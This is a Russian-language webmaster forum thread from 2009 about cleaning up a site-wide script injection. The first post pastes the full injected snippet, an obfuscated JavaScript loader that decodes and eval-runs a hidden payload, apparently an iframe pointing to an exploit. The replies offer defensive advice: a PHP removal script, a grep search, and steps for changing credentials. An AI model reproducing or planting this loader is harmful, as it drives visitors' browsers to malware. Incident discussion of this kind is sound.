+ + +
С нами с 20.11.04
Сообщения: 119
Рейтинг: 3
|
 Добавлено: 26/02/09 в 21:43 |
В html файлах которые создал после открытия тега body добавилось вот это
<script language=JavaScript> function ffpbnb25(z) {var
c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,58,52,8,44,50,24,25,59,35,0,0,0,0,0,0,62,42,19,4,3,18,26,45,13,36,12,61,57,30,5,20,34,31,46,6,60,32,53,54,10,9,2,0,0,0,0,55,0,37,28,11,48,38,47,40,33,49,56,1,15,14,39,16,21,51,29,7,22,17,0,23,43,41,27);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(165^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}ffpbnb25('EqT5kx42cFr2CsH2t9yUhxT5vcgnkx4io9JdcsKPEQHquDb9ZeYqDQHi3DbhcBJ5v9LIkl7duS7htQGi6M6qusrVQAgPEFrVvDbdc5T5Dx4PuxgeZ131CsrqcMG5ofbdHPmiu_TPwBT5kxJ5H5j9OX7abSY9mXjIkl7duSyUmXjhNXHqksrq6EYIut6qvq4dHsHeOEYaNFr2bnJd6M6dJzrVYBJ_QR45cDThzeyPJlTVC9JdzX39')
</script>
троян?
как бороться? кто подскажет?
|
|
|
|
| |
С нами с 31.07.07
Сообщения: 331
Рейтинг: 129
|
| Добавлено: 26/02/09 в 21:50 |
Tроян.HTML:IFrame-CC [Trj]
|
|
|
|
| |
С нами с 23.01.09
Сообщения: 202
Рейтинг: 27
|
| Добавлено: 26/02/09 в 21:55 |
скорее всего ифрейм на сплоит
| Asmodeus писал: |
как бороться? кто подскажет? |
сотри код и поменяй все пароли.
если появится снова, ищи чужие файлы на хосте
|
|
|
|
| |
С нами с 23.01.09
Сообщения: 202
Рейтинг: 27
|
| Добавлено: 26/02/09 в 21:56 |
| SN211 писал: | | Tроян.HTML:IFrame-CC [Trj] |
да IFrame, я был прав
|
|
|
|
| |
127.0.0.1
С нами с 26.04.06
Сообщения: 1092
Рейтинг: 557
|
| Добавлено: 28/02/09 в 01:15 |
варианта два:
1) спиздили через пинч фтп-акки, которые прописаны в фаре или тоталкоммандере,
2) бэкдор подхватил, попиздили секурную инфу (файлы с паролями).
по поводу восстановления файлов, есть такой скрипт:
| Код: |
<?
chdir("../..");
foreach (glob("*",GLOB_ONLYDIR) as $d) {
echo "- {$d}: ";
if (!file_exists($d."/public_html/index.php")) {echo "-<br>\n";continue;}
$h=file_get_contents($d."/index.php");
copy ($d."/public_html/index.php",$d."/index.php.bak");
$p1=strpos($h,"<script language=JavaScript> function ");
print $p1.", ";
if ($p1===false) {echo "?<br>\n";continue;}
$p2=strpos($h,"</script>",$p1)+9;
print $p2." ";
if ($p2===false) {echo "??<br>\n";continue;}
$z=fopen($d."/public_html/index.php","w");
fputs($z,substr($h,0,$p1).substr($h,$p2));
fclose($z);
echo "ok<br>\n";
# break;
}
?>
|
кладешь в корень любого сайта, запускаешь с браузера
скрипт выходит на два уровня выше по каталогам (из public_html/имя_домена) в папку с сайтами и проверяет все index.php (заменить на свой вариант)
второй вариант, если сервер свой и есть доступ к шеллу:
cd /home
grep -irl "<script language=JavaScript> function " >> bad.txt &
как отработает скрипт, каким-нибудь парсером или простым пхп-скриптом очистить
все файлы от инъекции
третий вариант:
восстановить с бэкапов
ну и само собой - скачать CureIt, AVZ4 или еще чего, проверить винду (переставить)
и сменить все фтп-пароли (лучше сделать сразу и с другого компа)
если стоит вебмани, сменить ключи, пароли немедленно.
если это был пинч, то менять пароли ко всем критическим вебресурсам, где на автомате стоит автозаполнение в ИЕ
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 28/02/09 в 09:45 |
| localhost писал: | варианта два:
| Код: |
<?
chdir("../..");
foreach (glob("*",GLOB_ONLYDIR) as $d) {
echo "- {$d}: ";
if (!file_exists($d."/public_html/index.php")) {echo "-<br>\n";continue;}
$h=file_get_contents($d."/index.php");
copy ($d."/public_html/index.php",$d."/index.php.bak");
$p1=strpos($h,"<script language=JavaScript> function ");
print $p1.", ";
if ($p1===false) {echo "?<br>\n";continue;}
$p2=strpos($h,"</script>",$p1)+9;
print $p2." ";
if ($p2===false) {echo "??<br>\n";continue;}
$z=fopen($d."/public_html/index.php","w");
fputs($z,substr($h,0,$p1).substr($h,$p2));
fclose($z);
echo "ok<br>\n";
# break;
}
?>
|
|
т.к. дофига сейчас есть всяких попапов, и прочей фигни, скрипт может найти дофига чего нужного
| Цитата: | второй вариант, если сервер свой и есть доступ к шеллу:
cd /home
grep -irl "<script language=JavaScript> function " >> bad.txt &
|
я думаю не сильно прикольно парсить мувики, пикчи, бинари и прочее, которое составляет 70% от контента на сервере.
сначала проверь откуда на твой хост были заходы по фтп/ssh, если действительно были НЕ с твоих айпишников - заблочь фтп только для себя, смени пароли, почисть контент и спи спокойно.
если небыло - занчит ищи у себя на сервере скрипт, который раскидывает инъекции по файлам, и до того момента пока эот скрипт не найдёшь можешь даже не париться чистить контент.
А искать заражённые файлы судя по всему лучше по ffpbnb25 (не факт, название функции может генерится на лету), или по куску кодированной строки в конце кода.
|
|
|
|
| |
С нами с 05.11.08
Сообщения: 6
Рейтинг: 1
|
| Добавлено: 02/03/09 в 07:01 |
Сделай бэкап, для этого их и придумали, пользуйся самыми новыми браузерами.
|
|
|
|
| |
С нами с 12.03.09
Сообщения: 1
|
| Добавлено: 13/03/09 в 03:13 |
Хочу узнать мнение по поводу использования сервисов онлайн проверки сайта на вирусы и мониторинга (изменение скриптов). Например siteguard.ru . Могут ли они помочь в подобных случаях.
|
|
|
|
| |
Чингачгук, вождь красноглазых
С нами с 14.05.04
Сообщения: 4744
Рейтинг: 1824
|
| Добавлено: 16/03/09 в 05:14 |
| Цитата: | варианта два:
1) спиздили через пинч фтп-акки, которые прописаны в фаре или тоталкоммандере,
2) бэкдор подхватил, попиздили секурную инфу (файлы с паролями).
|
Или еще вариант - просто подобрали пароли на FTP. Наверное, не просто ж так боты перебирают их целыми днями на серваках.
|
|
|
|
| |
Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте! |
|
Спонсор раздела
|
